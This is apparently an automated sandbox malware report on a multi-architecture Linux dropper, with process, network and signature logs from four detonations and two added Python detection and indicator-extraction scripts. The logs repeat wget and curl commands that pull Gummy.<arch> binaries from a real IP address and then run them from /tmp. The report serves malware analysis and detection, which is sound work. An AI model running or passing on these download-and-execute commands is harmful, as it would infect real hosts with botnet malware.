Analysis Overview
SHA256
714d4cbbefe02a253c95ec26c8aa552bb48de01a9604086a61a1db89a3722bd6
Threat Level: Shows suspicious behavior
The file bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 was classified as: shows suspicious behavior. Across all four detonations it fetches a Gummy.<arch> binary for ten CPU architectures from 45.95.168.234, writes it to /tmp/SSH, marks it executable and runs it, which is the download-and-execute loop typical of a multi-architecture Linux dropper script.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-23 23:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
60s
Max time network
132s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-CEV6jt]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 config-err-YaDWEb netplan_00jvjmdy snap-private-tmp SSH ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0]
/tmp/SSH
[./SSH Gummy-SSH]
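The process list above repeats the same five-step loop for ten architectures: fetch Gummy.<arch> with wget and again with curl, cat it (the redirection into SSH is not visible in argv, but the "Writes file to tmp directory" signature shows the parent opening /tmp/SSH for modification), chmod +x (the long argument list is a shell glob over /tmp expanding onto the sandbox's own systemd-private and netplan directories), then run ./SSH Gummy-SSH. As an added example, not code from the report or its sandbox, the following Python groups exec events by parent and flags a parent whose children download from a bare-IP URL, chmod +x something in a world-writable directory and then execute from that directory. The event model, the FETCH_TOOLS set, the scoring thresholds and the sample events are assumptions; the sample events are constructed to mirror this run's process list.

```python
"""Flag the fetch / chmod / execute-from-/tmp chain visible in the report's
process list. Added example; not code from the report or its sandbox.

Assumed input model (not from the report): one ExecEvent per execve, with
pid, ppid, exe, argv and cwd, as an EDR or auditd EXECVE feed provides.
FETCH_TOOLS, SCRATCH_DIRS and the score threshold are assumptions."""
import ipaddress
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set
from urllib.parse import urlparse

FETCH_TOOLS = {"/usr/bin/wget", "/usr/bin/curl", "/usr/bin/tftp"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
URL_RE = re.compile(r"https?://\S+")


@dataclass
class ExecEvent:
    pid: int
    ppid: int
    exe: str
    argv: List[str]
    cwd: str = "/tmp"  # the report's relative chmod targets imply cwd=/tmp


@dataclass
class Finding:
    parent_pid: int
    urls: List[str] = field(default_factory=list)
    hosts: Set[str] = field(default_factory=set)
    chmod_targets: List[str] = field(default_factory=list)
    executed: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        # Executing out of a scratch dir weighs most; the rest are supporting signals.
        s = 2 if self.executed else 0
        s += 1 if self.urls else 0
        s += 1 if any(_is_bare_ip(h) for h in self.hosts) else 0
        s += 1 if self.chmod_targets else 0
        return s


def _is_bare_ip(host: str) -> bool:
    """True when the URL host is a literal IP rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _resolve(path: str, cwd: str) -> str:
    return os.path.normpath(path if path.startswith("/") else os.path.join(cwd, path))


def _in_scratch_dir(path: str, cwd: str) -> bool:
    return _resolve(path, cwd).startswith(SCRATCH_DIRS)


def find_download_exec_chains(events: List[ExecEvent], min_score: int = 4) -> List[Finding]:
    """Group children by parent pid and keep parents whose children together
    fetch a URL, make a scratch-dir file executable and run from there."""
    by_parent: Dict[int, Finding] = {}
    for ev in events:
        f = by_parent.setdefault(ev.ppid, Finding(parent_pid=ev.ppid))
        if ev.exe in FETCH_TOOLS:
            for arg in ev.argv[1:]:
                if URL_RE.fullmatch(arg):
                    f.urls.append(arg)
                    host = urlparse(arg).hostname
                    if host:
                        f.hosts.add(host)
        elif os.path.basename(ev.exe) == "chmod" and "+x" in ev.argv[1:]:
            # In the report the argument list is a shell glob over /tmp, so
            # keep only targets that actually live in a scratch directory.
            f.chmod_targets.extend(a for a in ev.argv[2:] if _in_scratch_dir(a, ev.cwd))
        elif _in_scratch_dir(ev.exe, ev.cwd):
            f.executed.append(" ".join(ev.argv))
    return [f for f in by_parent.values() if f.score >= min_score]


# Constructed sample mirroring the behavioral1 process list (values from the report).
ARCHS = ["x86", "mips", "mpsl", "arm4", "arm5", "arm6", "arm7", "ppc", "m68k", "sh4"]
DROPPER = "/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118"
BASE_URL = "http://45.95.168.234/bins/Gummy."


def sample_events() -> List[ExecEvent]:
    events = [ExecEvent(pid=100, ppid=1, exe=DROPPER, argv=[DROPPER])]
    pid = 101
    for arch in ARCHS:
        url = BASE_URL + arch
        for exe, argv in [
            ("/usr/bin/wget", ["wget", url]),
            ("/usr/bin/curl", ["curl", "-O", url]),
            ("/bin/cat", ["cat", f"Gummy.{arch}"]),
            ("/bin/chmod", ["chmod", "+x", os.path.basename(DROPPER), "SSH"]),
            ("/tmp/SSH", ["./SSH", "Gummy-SSH"]),
        ]:
            events.append(ExecEvent(pid=pid, ppid=100, exe=exe, argv=argv))
            pid += 1
    return events


if __name__ == "__main__":
    for finding in find_download_exec_chains(sample_events()):
        print(f"parent {finding.parent_pid}: score={finding.score} hosts={sorted(finding.hosts)} "
              f"fetches={len(finding.urls)} executions={len(finding.executed)}")
```

Scoring by parent rather than by single event is what makes this robust to the report's shape: no individual wget, chmod or ./SSH line is suspicious on its own, but one parent driving all three from /tmp is. The dropper's own launch (a /tmp executable run by the sandbox) scores only 2 and is correctly not reported.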
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.15:443 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
Files
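The network table for this run lists twenty connections to 45.95.168.234:80, matching the twenty wget and curl invocations in the process list, plus a few destinations (the mDNS multicast address and 185.125.188.62, 151.101.1.91 and 195.181.164.15 on 443) that no command line references and that are absent from the three Debian runs below; those are most plausibly the Ubuntu guest's own traffic rather than the sample's. As an added example, not code from the report or its sandbox, the following Python parses the report's own layout, separates indicators that a command line references from destinations merely seen on the wire, and emits Suricata rules for the former. REPORT_EXCERPT is a constructed, cut-down copy of this run's listing; the rule text, SID range and `$HOME_NET` are assumptions.

```python
"""Turn a sandbox report in this page's layout into blockable indicators.
Added example; not code from the report or the sandbox vendor.

REPORT_EXCERPT is a constructed cut-down copy of the report's process list,
its 'Writes file to tmp directory' row and its network table. The Suricata
rule text and SID range are assumptions."""
import os
import re
from collections import Counter
from typing import Dict, List, Set
from urllib.parse import urlparse

REPORT_EXCERPT = """\
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/tmp/SSH
[./SSH Gummy-SSH]
[wget http://45.95.168.234/bins/Gummy.mips]
[wget http://45.95.168.234/bins/Gummy.mpsl]
[wget http://45.95.168.234/bins/Gummy.arm4]
[wget http://45.95.168.234/bins/Gummy.arm5]
[wget http://45.95.168.234/bins/Gummy.arm6]
[wget http://45.95.168.234/bins/Gummy.arm7]
[wget http://45.95.168.234/bins/Gummy.ppc]
[wget http://45.95.168.234/bins/Gummy.m68k]
[wget http://45.95.168.234/bins/Gummy.sh4]
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
| N/A | 224.0.0.251:5353 | udp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
"""

CMD_RE = re.compile(r"^\[(.+)\]$")          # "[argv...]" lines under Processes
URL_RE = re.compile(r"https?://\S+")
# Network rows, whether the empty Domain cell sits before or after the protocol.
NET_RE = re.compile(r"^\|\s*\S+\s*\|\s*([\d.]+):(\d+)\s*\|\s*(?:\|\s*)?(tcp|udp)")
FILEMOD_RE = re.compile(r"^\|\s*File opened for modification\s*\|\s*(\S+)\s*\|\s*(\S+)")


def extract_iocs(report: str) -> Dict[str, object]:
    """Collect download URLs, dropped files, executed commands and wire
    destinations from the report text, keyed by where each came from."""
    urls: Set[str] = set()
    executed: List[str] = []
    dropped: List[str] = []
    droppers: Set[str] = set()
    conns: Counter = Counter()
    for raw in report.splitlines():
        line = raw.strip()
        if m := CMD_RE.match(line):
            argv = m.group(1).split()
            urls.update(a for a in argv if URL_RE.fullmatch(a))
            if argv and argv[0].startswith("./"):
                executed.append(" ".join(argv))
        elif m := NET_RE.match(line):
            conns[(m.group(1), int(m.group(2)), m.group(3))] += 1
        elif m := FILEMOD_RE.match(line):
            dropped.append(m.group(1))
            droppers.add(m.group(2))
    archs: Set[str] = set()
    names: Set[str] = set()
    for u in urls:  # Gummy.x86 -> payload name "Gummy", architecture "x86"
        stem, _, suffix = os.path.basename(urlparse(u).path).rpartition(".")
        names.add(stem)
        archs.add(suffix)
    return {
        "download_urls": sorted(urls),
        "distribution_hosts": {urlparse(u).hostname for u in urls},
        "payload_names": names,
        "architectures": sorted(archs),
        "dropped_files": dropped,
        "droppers": droppers,
        "executed": executed,
        "connections": conns,
    }


def background_destinations(iocs: Dict[str, object]) -> Set[str]:
    """Destinations seen on the wire that no command line referenced. In a
    sandbox these are usually the guest OS itself, so keep them out of blocklists."""
    return {ip for (ip, _port, _proto) in iocs["connections"]
            if ip not in iocs["distribution_hosts"]}


def suricata_rules(iocs: Dict[str, object], base_sid: int = 9000001) -> List[str]:
    """One http.uri rule on the shared download path prefix plus one rule per host."""
    rules: List[str] = []
    prefix = os.path.commonprefix([urlparse(u).path for u in iocs["download_urls"]])
    if prefix:
        rules.append(f'alert http $HOME_NET any -> any any (msg:"Multi-arch dropper fetch {prefix}"; '
                     f'flow:established,to_server; http.uri; content:"{prefix}"; startswith; '
                     f'sid:{base_sid}; rev:1;)')
    for i, host in enumerate(sorted(iocs["distribution_hosts"]), start=1):
        rules.append(f'alert ip $HOME_NET any -> {host} any (msg:"Dropper distribution host {host}"; '
                     f'sid:{base_sid + i}; rev:1;)')
    return rules


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_EXCERPT)
    print("hosts:", sorted(iocs["distribution_hosts"]), "archs:", iocs["architectures"])
    print("background:", sorted(background_destinations(iocs)))
    print("\n".join(suricata_rules(iocs)))
```

The ten architecture suffixes (x86, mips, mpsl, arm4 to arm7, ppc, m68k, sh4) are the strongest hunting artifact here: the download path prefix is stable across them, so a single URI-prefix rule covers every variant the dropper knows about, whereas the host alone changes as soon as the operator moves the server.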
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
debian9-armhf-20240611-en
Max time kernel
63s
Max time network
67s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/SSH | /tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 | N/A |
Processes
/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118
[/tmp/bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.x86]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.x86]
/bin/cat
[cat Gummy.x86]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mips]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mips]
/bin/cat
[cat Gummy.mips]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.mpsl]
/bin/cat
[cat Gummy.mpsl]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm4]
/bin/cat
[cat Gummy.arm4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH systemd-private-8ac9b20eda93434480f68b279ed4afad-systemd-timedated.service-FfZxiF]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm5]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm5]
/bin/cat
[cat Gummy.arm5]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm6]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm6]
/bin/cat
[cat Gummy.arm6]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.arm7]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.arm7]
/bin/cat
[cat Gummy.arm7]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
| HR | 45.95.168.234:80 | | tcp |
Files
memory/776-1-0xb673d000-0xb674e044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-23 23:19
Reported
2024-08-23 23:22
Platform
debian9-mipsbe-20240611-en
Max time kernel
78s
Max time network
83s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
| N/A | /tmp/SSH | /tmp/SSH | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
